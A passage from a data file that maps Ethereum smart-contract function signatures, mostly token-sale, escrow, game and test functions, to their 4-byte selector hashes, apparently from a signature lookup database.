"setDropable(bool)": "0xba044799", "setMintable(bool)": "0x285d70d4", "actualCap()": "0x5502109e", "XfinityUtility()": "0x948bc5d6", "unLockBatchAddr()": "0x99d5af62", "unLockAddrOwner(address)": "0xf3a60cb4", "unLockAddr()": "0x50c90af0", "getLockerAddr(uint256)": "0xe8d07525", "getLockerCount()": "0xc56893fb", "getSingleLocker(address)": "0x214e8a47", "_resetList()": "0x7f9785b0", "_removeFromList(address[],address)": "0xdba07858", "_updateList(address[],address,address[])": "0x00199b79", "_addToList(address[],address)": "0x68fd22d3", "_changeAdmin(address,address)": "0x494b46f9", "_getList()": "0x0962f869", "_getIndex(address,address)": "0xc7e56740", "_isAccepted(address,address)": "0x9b181e39", "_isListed(address,address)": "0xf8823353", "_isAdmin()": "0xfc601902", "createNew(address,address,uint256)": "0x9b33093f", "_buyMulti(address,bytes32)": "0x6a049b62", "_canDownload(bytes32,uint8,bytes32,bytes32)": "0x0d75d68e", "STSTEST1()": "0x44b81854", "Tokenomicx()": "0xfb756f97", "calTripleRoom(uint256,uint256,uint256,bytes32)": "0x617421c9", "calSimpleRoom(uint256,uint256,uint256,bytes32)": "0x76ccf063", "calculateRoom(uint256,uint256,uint256,bytes32)": "0x291f028d", "ifcoinToken()": "0xe9263f9d", "MeraToken()": "0x6321f298", "dispute(address,bool,uint256)": "0x2fb61f7d", "ticket(address,bool,uint256)": "0x0e801d7a", "rentModified(address,uint256,uint256)": "0x35468963", "deposit(address,uint256,uint256)": "0x0efe6a8b", "rubyToken()": "0x620db609", "LIRAX()": "0x3f5adb8e", "BubToken(address)": "0x331d03d1", "addToBalance(uint256)": "0x8a19e355", "getTokenExchangeRate()": "0xc01d1c60", "setTokenForPublicSale(uint256)": "0xe163698a", "setTokenForPreSale(uint256)": "0xe64906a4", "setMinPrivateSaleCompanyBuy(uint256)": "0xda4751c0", "getMinPrivateSaleCompanyBuy()": "0x1d90824b", "setMaxPrivateSaleBuy(uint256)": "0xeec4bcef", "getMaxPrivateSaleBuy()": "0xfba6748c", "setMinPrivateSaleBuy(uint256)": "0x397412cb", "getMinPrivateSaleBuy()": "0xd3e82be8", "setBonusAddress(address)": "0xc97f8363", "setAffiliateRate(uint256)": "0xb1c5f992", "getAffiliateRate()": "0x9d1672c4", "setIcoPhaseAddress(address)": "0xe7933d58", "TDx(uint256,string,uint8,string)": "0xf3b55007", "updatePost(uint256,string,string)": "0x66d1cac9", "createPost(string,string)": "0x392338f5", "setPointIdentifier(string,int256)": "0xaf8d7611", "TopsXToken(uint256,string,uint8,string)": "0x4a8c2d64", "isValid(string,address,uint256)": "0x77cfe1c1", "ActivateEscrow(uint256)": "0xb2bb419f", "GetEscrowETHBalance()": "0xe219aa11", "WhoisOwner()": "0x679a7a46", "getMainsale()": "0x1816e794", "getPresale2()": "0x34335c01", "getPresale1()": "0x76d6c296", "getBasePrice()": "0xb49f4afd", "getDrupeCoin()": "0x499fd141", "TestETHToken()": "0x56e4e073", "PacificaToken()": "0x95a59ac4", "CTCB()": "0xc107b9b8", "etherToSendDev()": "0xe80fd970", "payDev()": "0xd243ec26", "Sunny2()": "0x0850e4c3", "AcceptsSunny2(address)": "0xcee6b0d9", "NotifyMe(address,uint256)": "0xfb1ce2ea", "GetEscrowCreationDate()": "0x5bc6e107", "GetEscrowOwner()": "0x1a6a3c03", "GetEscrowBalance()": "0x335ae0cb", "IsEscrowActive()": "0xfacaa838", "GetBuyingTokenAddress()": "0x87eba3c7", "GetAskingTokenBought()": "0x1853d033", "GetAskingUnitPrice()": "0x9610e068", "GetEscrowTokenSymbol()": "0x6744ea49", "isEscrowActive()": "0xb4bb1b0a", "GetSellingTokenUnitPrice()": "0xbcb1e4f7", "GetSellingTokenContractAddress()": "0x53067968", "GetSellingTokenDecimals()": "0xd2467e31", "GetSellingTokenSymbol()": "0x47e2a6f9", "Purchase(uint256,address,address)": "0x2d9abaed", "asserts(bool)": "0x58cc13f3", "script(address,bytes)": "0x8e4553a4", "smitToken()": "0x2147783f", "getUserBetsTimeStampInARazInstance(uint256,uint256)": "0xcb76937c", "bacancyToken()": "0xca8786c9", "PrakashToken()": "0x8a0490db", "Albarit()": "0x6d717daf", "firstRoomAvailable(string,uint256[])": "0xdc85561b", "InitializeCoinToUser(address)": "0x4ec6a61a", "CorpCoin(address,uint256)": "0x11715316", "userTenantHashExists(bytes32)": "0x8e8a4a20", "userAddressExists(address)": "0x02c90584", "updateTimestamp(bytes32,uint256)": "0xdd14ab79", "updateAddress(address,address)": "0x9bfa882e", "updateHash(bytes32,bytes32,uint256)": "0x72108714", "getUserTenantId(address)": "0xaaa668aa", "CITY_START_PRICE()": "0x03267c60", "invoicesStackCount()": "0xd7a8560f", "dividendAddr()": "0x9eab503a", "parsecCreditContract()": "0xf179f9f1", "totalDevCoin()": "0xb77da4a0", "FT_TEAM_FUND()": "0x3aa612b9", "bountyOwnersTokens()": "0x7a1ab407", "unpausecontract()": "0x4ec8a8ff", "ESOPLegalWrapperIPFSHash()": "0x9afec0ae", "marketingTokensPercent()": "0xd15e1014", "numberOfSales()": "0x21745c15", "BP_ATHENIAN()": "0x8d81a88f", "contractUpgradable()": "0x78b150bd", "niceguy4()": "0x78bb9e54", "priceFci()": "0x2bc53254", "frozenDaysForPartner()": "0x121e6832", "minWeiValue()": "0x01e1c861", "addressCoreSupply()": "0x55177ef1", "TOKENOPSPLATFORM_JOINTTOKENS()": "0x00dba864", "tokensSoldWithBonus()": "0x13f0790c", "lastBlock_a9Hash_uint256()": "0x3f81e4be", "redTeamAddress()": "0x80f8d688", "FUTURE_DISTRIBUTE_LIMIT()": "0x2604f424", "whiteListingContract()": "0xb0e1f553", "latestEditionReleased()": "0xa9c38476", "CanChange()": "0x894306d5", "bltMasterToSale()": "0x6b98c85c", "wasSoftCapMet()": "0x464e47b4", "isCappedInEther()": "0x5581800c", "airDropAmount()": "0x08e9988b", "IS_TIER_CONTRACT_MAGIC_NUMBER()": "0xfa50b335", "balanceImportsComplete()": "0xe2583070", "reserveSupply()": "0x03d41eb6", "mintAdvisorTokens()": "0x90b4cc05", "ethPriceFeed()": "0xaf7665ce", "foundersTimelock2()": "0xc61f1103", "teamUnlock4()": "0x361c14b0", "totalLendingAmount()": "0x15d28e11", "RANGESTART_PRESALE()": "0x15519af1", "isVotingPrepare()": "0x6c720446", "FP_SCALE()": "0x5573a34c", "tokensAlreadyMinted()": "0x1eeccead", "lockholderNumber()": "0x8cbc8c0b", "LOOMIA_REMAINDER()": "0xeb663cf2", "Scope()": "0xa2240eb0", "votingDuration()": "0x132002fc", "c_centsPerTokenFirst()": "0x8fc5efd4", "reserveTokensAddress()": "0xc611ded7", "tenZero()": "0x2adf7d2f", "tokenDec()": "0xdd791ce5", "floorPrice()": "0x9363c812", "taxRateNumerator()": "0x493fcf1c", "partnerCount()": "0xe79d0860", "crowdSaleInitialized()": "0x5f3ca167", "timeGap()": "0xdd5dd8f2", "currencyUpdateAgent()": "0x89aaad29", "phasePublicSale3_To()": "0x6c46ae22", "periodPreITO_endTime()": "0xcb91f1c2", "securityToken()": "0xb84dfbd2", "totalTokenBalance()": "0x3d4b2c2c", "LongTerm()": "0x57f2d763", "totalLoanAmount()": "0x4c9e502e", "refundIco()": "0xe42d674d", "bigBang()": "0x03cf0678", "ICOContract()": "0x682806a0", "wagerPool5()": "0x524d5ddb", "ethashContract()": "0x7f949ac0", "airDropManager()": "0x28c8f3ba", "pausePreSale()": "0x4357da58", "presaleTokenBalance()": "0x99369801", "MAX_PENDING_REQUESTS()": "0x363c6b81", "MAX_BET_VALUE()": "0x353086e2", "DentacoinAddress()": "0xb04247e9", "total_bet_withdrawn()": "0xc1a3bb06", "endICOp1()": "0xb0bebdf5", "MAX_CROWDSALE_CAP()": "0x70ab2359", "getPeriodBonus()": "0xe382c3e6", "maxCapIco()": "0xde60a67d", "BicycleSupply()": "0x8a0a53d5", "sumAcceptedVirtualContrib()": "0x152713b3", "rateAngelDay()": "0x3f3a78d5", "ethReward()": "0x3e05e01b", "startOpenPpTime()": "0xd3087ff5", "KYCLimitValue()": "0x42d9643c", "expiryDate()": "0x516dde43", "devFees()": "0x0224e9a7", "nextInListToReturn()": "0x757387d0", "bot()": "0x10814c37", "depositorLimit()": "0x6d5e78f9", "feeAccount1()": "0xa0179949", "teamDate()": "0xad9fb75e", "advisorsAllocatedAmount()": "0x8c655550", "managerNotSetInApp()": "0xd5dd5127", "maximumInvestment()": "0xb904088e", "availableTokensAmount()": "0xb1e3dd57", "withdrawTeamToken()": "0x0e438ee5", "address5()": "0x0e417055", "MIN_PURCHASE()": "0xd439390c", "minQuorum()": "0xb5a127e5", "changeStakingFeesOperation()": "0x6e66644d", "ten_wallet()": "0x657db38d", "targetDiscountValue3()": "0xa2bd018c", "icoFinalized()": "0xa106320a", "Norm()": "0xf82ec3e6", "getCurrentICOPhaseBonus()": "0x6cfe5947", "toEthertoteDevelopmentWallet()": "0x869b22fd", "TOTAL_CAP()": "0x02548866", "AmountToDistribute()": "0x2079405b", "minTransactionAmount()": "0x17a5d4df", "endDateOfVipPlacement()": "0xe1b54285", "S1()": "0x7826f28f", "buyIPC()": "0x25c10247", "commitEuro()": "0xe4002b30", "NOT_AUDITED()": "0x291194b2", "totalFinalised()": "0x4ed767a1", "staleTime()": "0x38b88052", "INIT_DATE()": "0xb642d58f", "preSaleDeposit()": "0x13be31ae", "numberOfCellsBought()": "0x08c409bb", "withdrawalAddress()": "0xf2bcd022", "decim()": "0xb6288553", "poWtfContract()": "0x7da39157", "benefitMicros()": "0xa4b159c0", "ADVISOR_STAKE_FOUR()": "0xfb74e6f7", "LEXInContract()": "0x1ad6037f", "change_block()": "0xbca58da8", "toRefund()": "0x8d288e93", "removeBankroll()": "0x5248f2c8", "ethFee()": "0x4cf1115d", "upgradedAddress()": "0x26976e3f", "LZLTokenDeposit()": "0x7bd85cb3", "pullEtherFromContractAfterICO()": "0xa8d3a63d", "purchaseContract()": "0xaa9f37f0", "getTotalSellingItem()": "0x654470fc", "targetContractId()": "0x51720b41", "getWeaponIds()": "0x808ac94d", "DELAY_PERIOD()": "0xe71a02e1", "crowdSaleType()": "0xc39a9d97", "cofounderVUPDestination()": "0xd9386c9f", "token4Gas()": "0xddc4aacf", "shareholdersWallet()": "0xea1a20d5", "teamTokenAmount()": "0xae28e912", "mainSale()": "0x60cfd359", "lastBlock_f3Hash_uint256()": "0x2cd05248", "ADV_BTY_SUPPLY()": "0x6b1092f2", "ICONIQ_SALE_CLOSING_TIME()": "0xf92a73d7", "tokensForCharity()": "0x44249f04", "maxStage()": "0x4571a7f1", "Total_Players()": "0xa5502b01", "Total_SoldToken()": "0xaf0c9259", "wdrawBfr()": "0x9fc21eeb", "PlatformInformation()": "0xe12badcf", "wanUnit()": "0x6b9a1db9", "ligerAdminAddress()": "0x84321b41", "PRESALE_ENDTIMESTAMP()": "0x9a82c93c", "FOUNDER_ADDRESS1()": "0xbd1d3432", "purchaseLimit()": "0x18886657", "preICOStartTime()": "0xbfcdbae9", "ifEndGetting()": "0x4eecafdb", "vanbexTeamAddress()": "0x09c62c5c", "prcSum()": "0x865a4253", "highestBidIsCC()": "0xffa094fb", "totalSoldSlogns()": "0xcc198380", "saleAction()": "0xd6fd1fe9", "swapTime()": "0x7fb181c1", "getCertificateExpires()": "0x0529de04", "minContribAmount()": "0x5b55169c", "getHolderIndex()": "0x1a2e2b2c", "digest()": "0x52a82b65", "ToptalToken()": "0x56ccf300", "RESERVED_TOKENS_BOUNTIES_ADVISORS()": "0x2dd117e0", "preferredSaleEndTime()": "0xb7f1e6af", "lockedTeamUFT()": "0xe2b4f4b5", "tokenCrowdsaleCap()": "0xd6f3c45f", "rewardPayableDays()": "0x7b75ea7b", "teamAllocated()": "0x329430ca", "SALE0_END()": "0xe4acecf3", "quarterFourth()": "0x997ffd13", "totalSupplyWithOutBonus()": "0xc0a1b72a", "crowdsaleClosedTime()": "0x78c5e86f", "Total_TokenSupply()": "0xd6391a01", "transferPreICOFunds()": "0xa3efc756", "collectdustatcontract()": "0x2f77428e", "mentors()": "0x8459857f", "csoAddress()": "0x2272b0af", "MONTH_IN_MINUTES()": "0x51af083b", "coldWallet()": "0x6be13c92", "shopSack()": "0x6810e139", "fundingMinimumTargetInUsd()": "0x141f6800", "teamBonusAllocatedTokens()": "0x3ca96e0e", "artistEmail()": "0x94201882", "getPrizeNumbers()": "0x5b3bf07a", "collectedEther()": "0x2474a21c", "_START_DATE()": "0xab5aa302", "factory_address()": "0xba92d382", "totalPresaleTokensSold()": "0x7365e2d7", "highFundingGoalReached()": "0x7d13a256", "cgoAddress()": "0xb76803b2", "externalCallFlag()": "0xfc9bfaa6", "PriceStrategy()": "0x709f84a4", "thirdExchangeRate()": "0x58d3ce8a", "totalOverthrows()": "0xdc951fdc", "nextLapId()": "0xf7edbbe6", "maxPowerUserAddress()": "0xf0863c08", "maxDGAME()": "0x5d295f67", "PRE_ICO_MAX_CAP()": "0x993d13bd", "lastBlock_f4Hash_uint256()": "0x38785014", "TXOtoken()": "0xd1a94e58", "crowdfundEndsAt()": "0x7ae79e86", "PRE_ICO_ADDR()": "0x799b7bb8", "manuallyResetGame()": "0x665905c6", "referredBonusRate()": "0xaa4537b2", "endDate2()": "0x39c480c9", "tankAllowance()": "0x45c38053", "VESTING_ADVISOR_CLIFF()": "0x4bc1aa42", "airDropTokenDestroy()": "0xa1c6d088", "sourcePrice()": "0x8708b5b2", "lastWinNumber()": "0x91f11a9c", "start_time()": "0x834ee417", "addressAdvisors()": "0xe0a1a292", "registry_exec_id()": "0x56f7cafe", "dropWallet()": "0xaa5d6d5f", "processInterval()": "0xf95e6306", "minimalGoalReached()": "0x2fa05208", "MIN_AUDIT_TIME()": "0xc16bca13", "odds()": "0x233de126", "roundCounter()": "0xfebc14b1", "manaToken()": "0x74c97c99", "buyTradeConfir()": "0x1d9d1bdc", "totalPublicSaleStage()": "0xa4af1d1a", "publicSaleEnd()": "0xec9b5cb2", "TOTAL_TOKENS_AVAILABLE()": "0x9103321d", "ICO_ENABLERS_CAP()": "0xcfd550a3", "icoRaised()": "0xc78a4c98", "tokenCreateFunction()": "0x0e7938ec", "myAddress()": "0x26b85ee1", "initialFundsReleaseDenominator()": "0xcc436196", "rewardToken()": "0xf7c618c1", "wct()": "0x917f635c", "editor()": "0xa464d265", "icoSince()": "0x3f1b1267", "zxcSold()": "0xc505c82c", "signer1()": "0x34107282", "TRANSFER_PROXY()": "0x96d6401d", "contributorTokens()": "0x936b603d", "tokenSC()": "0xc16849c0", "mineIsBigger()": "0xbf91cbb5", "preicobrandingWallet1Pct()": "0x341cc817", "defaultRegionTax()": "0xcd9a27ba", "expertTokensPerEth()": "0xede729ad", "refundSafe()": "0xc4264738", "ubiatarPlayVault()": "0x1178f51a", "Y1_lockedTokenAmount()": "0x92be675f", "withdrawCoreTeamTokens()": "0xf00648b8", "capPresale()": "0xd46cddd4", "joule()": "0xe506b9b7", "curVotes()": "0x929e902d", "smsVerifiedBonusBps()": "0x09491490", "totalCities()": "0xf09bea14", "INVESTMENT_USER2()": "0x6b8cc89d", "eighthTime()": "0x550b1f48", "icoSuccessful()": "0x835fa3ac", "bsWallet()": "0x96bc4a40", "STATEMENT_HASH()": "0x94c21ff3", "recipient2()": "0x0688b135", "REFUND_TIME()": "0x310092b9", "checkPrize()": "0x4de2d5d5", "toteLiquidatorWallet()": "0x4f7ac7ab", "option20name()": "0xd92d7056", "fundingTokens()": "0x2b359e6b", "burnerSet()": "0x6684ffcd", "lockAddress()": "0x7da3f613", "getUriCount()": "0x02d05531", "privateTotalSupply()": "0x996d21aa", "lockReleaseDate1Year()": "0x301ea971", "refundingEndtime()": "0x4a60751f", "platformTokens()": "0xb367fb11", "maxAmountPreICO()": "0x04338def", "saleIsFinished()": "0xcfdafde4", "stageAmount()": "0xbdbbfcad", "raisedOBR()": "0xe61d5d50", "collectAddr()": "0x346f9f95", "roundTwoRate()": "0x36da9ec9", "EGGS_TO_HATCH_1BANKER()": "0x70926370", "bountyVault()": "0x170e1dcb", "preAllocatedTokensVestingTime()": "0x9dc10d15", "totalFirstICOSupply()": "0xa6248874", "havven_escrow()": "0xa55c51d8", "PREICO_PERIOD()": "0x9c756ec9", "sanMaxFree()": "0x0821c87e", "tokenDistributionPool()": "0x10340069", "kittensIssued()": "0x1b9dbcaf", "manage()": "0xba2ee65c", "ROLE_MINT()": "0xd68d961a", "cloudsPerEth()": "0x883cd1a5", "secondRoundMayStart()": "0xd4483263", "virtualEntitiesCreated()": "0xa6044f28", "BOUNTY_TOKENS_LIMIT()": "0x7986c724", "endPvtSale()": "0x0c1cd8cd", "tdeStarted()": "0xf6e7b785", "getStat(bytes32,address)": "0x2f2712f8", "getWinners(bytes32)": "0x4a61fc1e", "getPlayers(bytes32)": "0xaf1e19d9", "endTime(bytes32)": "0x35a951b8", "isEndedTrack(bytes32)": "0x3c473336", "getBetAmount(bytes32)": "0xa469b809", "isReadyToStart(bytes32)": "0xc65ad85c", "getPortfolio(bytes32,address)": "0xd98c1524", "getPlayersByTrackId(bytes32)": "0x5c894469", "getTrackOwner(bytes32)": "0xe7ceaeab", "getCountReadyPlayerByTrackId(bytes32)": "0xe0aa5654", "getCountPlayerByTrackId(bytes32)": "0xd71331c2", "setPortfolio(bytes32,bytes32[],uint256[])": "0x6615e357", "withdrawRewards(bytes32)": "0x7dfb6626", "joinToTrack(bytes32)": "0xcc620704", "createTrackFromBack(bytes32,uint256)": "0x604a4bc8", "createTrack(bytes32)": "0x1ac33b3d", "getRate(uint256,bytes32)": "0x3694566e", "setRates(uint256,bytes32[],uint256[])": "0xd256451c", "Shakedown0x()": "0xaea68d6b", "createContract(bytes32,bytes20,bytes20,uint256,uint256,uint256)": "0xfa37668f", "validate_pko(address,bytes32,bytes)": "0x5530c519", "check_hash(address,bytes32,bytes32)": "0x7dd0d61c", "check_rhash(bytes32,bytes32)": "0x09959439", "reveal(bytes32,bytes32,address)": "0x29c510b6", "commit(address,bytes32,bytes,bytes32,uint8,bytes32,bytes32)": "0xf98bbc60", "verify_signature(bytes32,uint8,bytes32,bytes32,address)": "0x4446bb11", "IotPC(bytes32,bytes20,uint256,address,uint256,uint256)": "0x8b3cda96", "TheTokenG()": "0xdb1bdd1d", "updateInstantTrade(address)": "0x40b0a77f", "author()": "0xa6c3e6b9", "seller()": "0x08551a53", "getGuaranteedContributorsLenght()": "0x4996e899", "getAccountListLenght()": "0xbd47c1a2", "ctrlZee()": "0x9bcc2b27", "refferBonusFunction(uint256)": "0xcc2b20ff", "setSail(uint256,uint256,uint256,uint256,uint256,uint256)": "0xbc24d886", "Testcoin()": "0x5349cdb6", "SCTX()": "0x4392281e", "getUnsoldOwner()": "0xd7d1bdbd", "_validateTokensAmount(uint256)": "0xa15db1c5", "getTeamToken()": "0x5403a0e5", "getStageName()": "0x82f4ef73", "getStageAmount(uint256,address,address)": "0xc3b57af8", "getUnsoldReceived(uint256,address,address)": "0x7cd3969d", "endIco3()": "0x30fbe411", "startIco3(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x9e331188", "endIco2()": "0x341bcbc1", "startIco2(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x65f97082", "endIco1()": "0x28d42350", "startIco1(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x2d0d4827", "GetContractBalance()": "0xf6d0bf2f", "ContractOwnerWithdraw(uint256)": "0x9c756200", "GetDomainInfo(string)": "0xa727390d", "AddDomainInfoDocument(string,string)": "0x5160a21e", "TransferDomain(string,address)": "0x0288c0a0", "EditDomain(string,string)": "0x27b7d0a6", "RegisterDomain(string,string)": "0x706b5759", "getTokensContractAddress()": "0xc98d9b83", "setTokensContractAddress(address)": "0xa90b5e62", "VinaexToken()": "0xce1aafc0", "changeTypeHash(bytes32)": "0x98221166", "ValkyrieNetwork()": "0x4fe51ee6", "lIKETOKEN(uint256,string,string)": "0x47a11f26", "moveTokens(address,address,uint256)": "0x6f22993c", "setTrustedTokenHandler(address)": "0x090b78e9", "get_multiple(uint256,uint256)": "0x627d6f9f", "CandidToken()": "0xf7b92f34", "HT()": "0x08190cda", "JustinCoin()": "0xccf7fe56", "NHMToken()": "0xb4c045e4", "CryptoRiyal()": "0x00404930", "PGD()": "0x8706b052", "Flippitt(string,string,uint8,uint256,string)": "0x4ccd0e1e", "deblacklistAddress(address,address)": "0xf1b07f96", "dewhitelistAddress(address,address)": "0xbcf49c72", "KTCWhiteList()": "0x8e1227b2", "MRASToken()": "0xca87cb2a", "dedex(address,address,address,uint256,uint256,uint256)": "0x6d8a3650", "BiekensToken()": "0x1fdba848", "mToken(address,uint256)": "0x4102f4e8", "ADEVA()": "0x81b93757", "MulaCoin()": "0x971130b5", "setCoefficient(bytes2,string,uint256)": "0x83f7a095", "setIntervalCoefficient(bytes2,uint256,uint256,uint256)": "0x4e94fbcf", "removeIntervalCoefficient(bytes2,uint256)": "0x01512db1", "validate(uint256,uint256,uint256,string,string,string)": "0xe65dea55", "report(uint16,uint16,uint8)": "0xdd1a68c1", "hasEnoughTokensLeft(uint256)": "0x51d5d98d", "getBaseAmount(uint256)": "0xcacca238", "evacuateTokens(address)": "0xca4858af", "setCustomBonus(uint256)": "0xeaf39a14", "envokeTokenAllocation()": "0xf21439b5", "refundOnBehalf(address)": "0x5104cb5c", "asyncTransfer(address,uint256)": "0xb7ec44b4", "deleteUserClaimInBulk(address[])": "0x1481d439", "deleteUserClaim(address)": "0x64100038", "updateUserClaimInBulk(address[],uint256[])": "0xee2eba5b", "updateUserClaim(address,uint256)": "0x61f66dc4", "setMaxLength(uint256)": "0xdc2f7867", "getDrugsSinceLastCollect(address)": "0xebc16c5c", "getMyDrugs()": "0xa44b1756", "getMyKilo()": "0xa5987c9e", "getFreeKilo()": "0x1f194b9f", "calculateDrugBuySimple(uint256)": "0x25579702", "calculateDrugBuy(uint256,uint256)": "0x1ecd9f21", "calculateDrugSell(uint256)": "0x2bb22480", "buyDrugs()": "0x9fa0f763", "sellDrugs()": "0xe1e2ccd2", "collectDrugs(address)": "0x8d8f95d1", "DrugDealer()": "0x65a707bf", "isSpaceExist(uint256)": "0x39849a67", "getSpaceById(uint256)": "0x6dd749ba", "addSpaces(uint256[],uint256[],bytes)": "0x77086d94", "addSpace(uint256,uint256,bytes)": "0xbbe5d9d4", "ZperMainSale(address,uint256,uint256,uint256)": "0xa9445499", "upgradeTier(string)": "0x7906305b", "getKingdomOwner(string)": "0x434d185c", "getKingdomType(string)": "0x228ce144", "payJackpot5()": "0x1dc30bdb", "payJackpot4()": "0x6c82337e", "payJackpot3()": "0x9de9f1b8", "payJackpot2()": "0xda2d8720", "payJackpot1()": "0xbec24a0d", "createTransaction(uint256,address,uint256,uint256,address)": "0x01e5691c", "createKingdom(string,string,uint256,address,bool)": "0xba7cc631", "sendAffiliateValue(uint256,address)": "0x9f64b6fb", "purchaseKingdom(string,string,bool,address)": "0x4b855c62", "setWoodAddress(address)": "0x453dc243", "Map(address,address,uint256,uint256)": "0xfe094708", "resetTimer(string)": "0x01b125e6", "SmartDeposit()": "0xf90ce548", "changeAPTController(address)": "0xc5dce83d", "PlaceHolder(address)": "0xcca91579", "BunToken(address)": "0x8c4c26a3", "InvestCoin()": "0xb9045c00", "FullPayChain()": "0x36aa972e", "TGCToken()": "0x5416995e", "transferOwnershipReceive()": "0x0880fb66", "transferOwnershipSend(address)": "0x4ecb8d0f", "lockAccountOf(address)": "0xd264cfdc", "setLockAccount(address,uint256)": "0x95b1157d", "PI_EDIT_1()": "0x1f3fd5ca", "getUserFLCEarned(address,address)": "0x4a2c3204", "getUserDataOnToken(address,uint256)": "0x8fb197d1", "getUserDataOnEther(uint256)": "0x64cc7719", "NRB_Users()": "0x51fba575", "AngelTokensHolder(address,address,address)": "0x4776ed69", "Voicecoin()": "0xd60fa784", "setMaxContributionCrowdsaleAddress(address)": "0xe3b71ded", "getMaxContributionAmount()": "0xa9b2cc09", "CEEDCOIN()": "0x679f4d63", "getEggsSinceLastHatch(address,address)": "0x2604b767", "getMyCrabs()": "0x13defbd9", "claimFreeCrab()": "0xe190d1b5", "calculateDevFee(uint256)": "0x9a8cea82", "GRUCoin()": "0x20770caf", "getVideoGameItemOwner(uint256)": "0x337176cd", "modifyPowPrice(uint256,uint256)": "0x29c1c61e", "_createPow(string,address,uint256,uint256,uint256)": "0xe1c70b29", "getPow(uint256)": "0x1b1d95ff", "createContractPow(string,uint256,uint256)": "0x63d06dd4", "createPromoPow(address,string,uint256,uint256,uint256)": "0x8ef0f09a", "PowZoneToken()": "0x438f1eee", "transferToLimited(address,address,uint256,uint8)": "0x55f5856f", "transferToBranch(address,uint256)": "0x0e263906", "transferToTeam(address,uint256)": "0x7bb1a312", "incrementLimitBranch()": "0xd0a63663", "incrementLimitTeam()": "0xa1ecb43c", "getLimitedBalanceOf(address)": "0xd0c1c844", "getLimitTypeOf(address)": "0x95c0c447", "limitOfBranch()": "0x13c7db1a", "limitOfTeam()": "0x3587904b", "POOL_EDIT_1()": "0x420d23fd", "updateMemeUrl(uint256,string)": "0x3d49ba0f", "_validateUrl(string)": "0xe6dc3655", "createMeme(string,uint256)": "0x55765e9a", "_createMeme(string,uint256,address)": "0x9acb1506", "CryptoMemes()": "0xca0fe62a", "EcoLend()": "0x4c6e4453", "LSC(uint256,string,string,uint8)": "0x704dcedd", "MyOffer(uint256,string,uint8,string)": "0x830b6b87", "alterGiveKarmaFee(uint256)": "0xd519fdc5", "viewGiveKarmaFee()": "0xf11dd6ac", "giveKarma(uint256,string,string)": "0xea593025", "viewKarmaVotesBySymbol(string,address)": "0x5ba1a1d4", "viewKarmaVotes(uint256)": "0x703950ff", "viewCoinsKarmaBySymbol(string)": "0x0c59b556", "viewCoinsKarma(uint256)": "0xa663b5de", "BitPeso()": "0xb3b71063", "CreditleetToken()": "0x12342248", "TPIToken()": "0x4934453a", "HRWtoken(uint256,string,uint8,string,address)": "0x9fc9ceb8", "totalSale()": "0xea4ce239", "allowanceTransfer()": "0x3ebb047f", "saleValve(bool)": "0x4eb1f578", "changeSaleSettings(address,address,uint256,uint256,uint256)": "0x44c71ef2", "changePermission(address,bool)": "0x8eb5a7ac", "LittleStoreERC20Token()": "0x2b985942", "_timePer()": "0x20fee8f1", "LindaCrowdsale(uint256,uint256,uint256,uint256,uint256,address,address,address,address,uint64,uint64)": "0x16f25d16", "OpenANXToken(address)": "0xa5c12df9", "valueGet(address,string)": "0x98e09333", "valueGet(string)": "0x8e6b851d", "valueDelete(string)": "0x579f61d8", "valueSet(string,bytes)": "0x17676e4c", "broadcastState(bytes)": "0xcd2a7a61", "checkState(bytes)": "0x3660943d", "raiseSellOrderCancelled(address,uint256,uint256,uint256,uint256,uint256,int160)": "0x712dd575", "raiseSellOrderMatched(address,address,uint256,uint256,uint256,uint256,uint256,uint256,uint256,int160)": "0x9d45d077", "raiseSellOrderCreated(address,uint32,uint32,uint80,uint256,int160)": "0x847a1ca6", "raiseBuyOrderCancelled(address,uint256,uint256,uint256,uint256,uint256,int160)": "0x1df87cad", "raiseBuyOrderMatched(address,address,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,int160)": "0x3c06ae68", "raiseBuyOrderCreated(address,uint32,uint32,uint80,uint256,int160)": "0xa94387a6", "raiseDollarsWithdrawalCancelled(address,uint160,int160)": "0x3b949785", "raiseDollarsAdded(address,uint160,int160)": "0x3be546a2", "raiseDollarsDeducted(address,uint160,int160)": "0xf26cbe9a", "raiseDollarsWithdrew(address,uint160,int160)": "0x73206348", "raiseDollarsFunded(address,uint160,int160)": "0x0f5a8d9c", "raiseCoinsAdded(address,uint32,uint256)": "0xce774030", "raiseCoinsDeducted(address,uint32,uint256)": "0x2ee6807a", "raiseCoinsSeeded(address,uint32,uint256,uint256)": "0xd970c19b", "raiseTraderUnregistered(address)": "0x797f6bb1", "raiseTraderRegistered(address)": "0x391687e3", "BankAccount()": "0x92fa1453", "getAccountCount()": "0xa98e4e77", "addAccountWithBalance(uint16)": "0x786ab4b6", "getBalance(uint8)": "0xe3a12480", "SavingsBank()": "0x253d8195", "test_hasClaimableShares_zeroClaimableStake()": "0xc68f7dfc", "test_hasClaimableShares_nonZeroClaimableStake()": "0x4e725b7a", "test_rewardPoolShare_isTranscoder()": "0x68afc7c4", "test_rewardPoolShare_notTranscoder()": "0x790a091e", "test_rewardPoolShare_noClaimableStake()": "0x63a37503", "test_feePoolShare_isTranscoder()": "0xf03c58ca", "test_feePoolShare_notTranscoder()": "0x2f2035ed", "test_feePoolShare_noClaimableStake()": "0x626452df", "test_claimShare_emptyFeeAndRewardPools()": "0xf46332e0", "test_claimShares_emptyRewardPool_isTranscoder()": "0xd5b235d0", "test_claimShares_emptyRewardPool_notTranscoder()": "0x566eebd8", "test_claimShares_emptyFeePool_isTranscoder()": "0xa3a4a18b", "test_claimShares_emptyFeePool_notTranscoder()": "0x51f59db2", "test_claimShare_isTranscoder()": "0x148ce4a4", "test_claimShare_notTranscoder()": "0xcbd1b782", "test_init()": "0x964fb96d", "Constructor(string)": "0x5cdbd2d1", "closePot(string)": "0xa577efd4", "canClosePot(string)": "0x4ccb5a33", "joinPot(string)": "0x02ec77d2", "createPot(string)": "0xf5e33a9d", "availableOwnerWithdraw()": "0x6c787229", "PotOfEther()": "0x9092b623", "saleInProgress()": "0xed7a96e7", "openSale()": "0x167ff46f", "closeSale()": "0xee55efee", "checkFundingGoalReached()": "0x59f974ce", "adjustBonusPrice()": "0x1c6868c8", "claimToken()": "0x4451d89f", "getMaximumFunds()": "0x6f54e89e", "getMinimumFunds()": 